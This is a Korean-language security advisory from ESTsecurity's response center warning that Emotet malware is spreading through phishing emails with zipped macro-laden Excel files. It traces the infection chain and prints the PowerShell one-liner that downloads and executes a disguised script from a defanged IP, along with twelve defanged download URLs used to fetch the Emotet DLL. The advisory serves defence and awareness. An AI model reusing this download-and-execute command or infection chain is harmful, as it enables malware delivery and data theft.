피싱 메일을 통해 대량으로 유포중인 이모텟(emotet) 악성코드 주의!

 

 

안녕하세요? 이스트시큐리티 시큐리티대응센터(이하 ESRC)입니다.

어제부터 이모텟(emotet) 악성코드가 대량으로 유포중에 있어 사용자들의 주의가 필요합니다. 

 

 

[그림 1] 이모텟을 유포하는 스팸메일

 

 

이메일에는 별다른 내용 없이 첨부되어 있는 압축파일의 패스워드만 적혀있습니다. 

 

압축파일 내에는 매크로가 포함된 엑셀 파일이 포함되어 있으며, 문서가 보호되어있다며 사용자로 하여금  '콘텐츠 사용' 버튼의 클릭을 유도합니다. 

 

 

[그림 2] 악성 매크로가 포함되어 있는 엑셀 파일

 

 

해당 엑셀파일에는 매크로 악성파일이 포함되어 있으며, 매크로는 특정 사이트에서 html을 hta 형식으로 실행합니다.

 

 

[그림 3] 엑셀 파일 내 매크로

 

 

html은 난독화 되어 있으며, 최종적으로 내부에 포함된 파워쉘 스크립트를 실행합니다 

 

 

[그림 4] 파워쉘 스크립트

 

powershell.exe -noexit $c1='(New-Object Net.WebClient).DownloadString('hxxp://91.240.118[.]168/qqw/aas/se.png')';IEX $c1|IEX

 

 

파워쉘 스크립트는 se.png 명의 파일을 내려받는데, 해당 파일은 .png 파일을 위장한 파워쉘 스크립트입니다.  해당 스크립트는 내려받음과 동시에 실행이 되며, 내부에 포함되어 있는 12개의 url 중에서 접속이 성공하는 주소에 접속하여 QWER.dll 파일을 내려받아 실행합니다. 

 

 

[그림 5] 파워쉘 스크립트 2 

 

 

이모텟 다운로드 C&C 주소

hxxp://kuyporn[.]com/wp-content/XSs5
hxxp://jeffreylubin[.]igclout[.]com/wp-admin/vzOG
hxxp://flybustravel[.]com/cgi-bin/2TjUH
hxxp://docs-construction[.]com/wp-admin/JJEf0kEA5
hxxp://wallacebradley[.]com/css/YcDc927SJR
hxxps://algzor[.]com/wp-includes/ghFXVrGLEh
hxxps://pcovestudio[.]com/wp-admin/c3zgRi2wXwCbdSD3iz
hxxps://grupomartinsanchez[.]com/wp-admin/QpFDJPMY49
hxxps://elroieyecentre[.]org/cgi-bin/l42slgmf8nBpUYsb
hxxps://bluwom-milano[.]com/wp-content/FEj3y4z
hxxps://thaireportchannel[.]com/wp-includes/KaWZp0odkEO
hxxps://esaci-egypt[.]com/wp-includes/W7qXVeGp

 

 

이렇게 최종적으로 내려받은 dll은 이모텟 악성코드로 rundll32를 통해 실행되어 사용자 정보 탈취 등 악성행위를 합니다. 

 

 

 

[그림 6] 최종적으로 내려받는 이모텟

 

 

최근 이메일 첨부파일을 통한 이모텟(Emotet) 유포 건수가 급증하였습니다. 

 

사용자 여러분들께서는 수상한 이메일을 수신하였을 시, 바로 삭제하시기를 권고드립니다. 

현재 알약에서는 해당 악성코드에 대해 Trojan.Agent.Emotet으로 탐지중에 있습니다.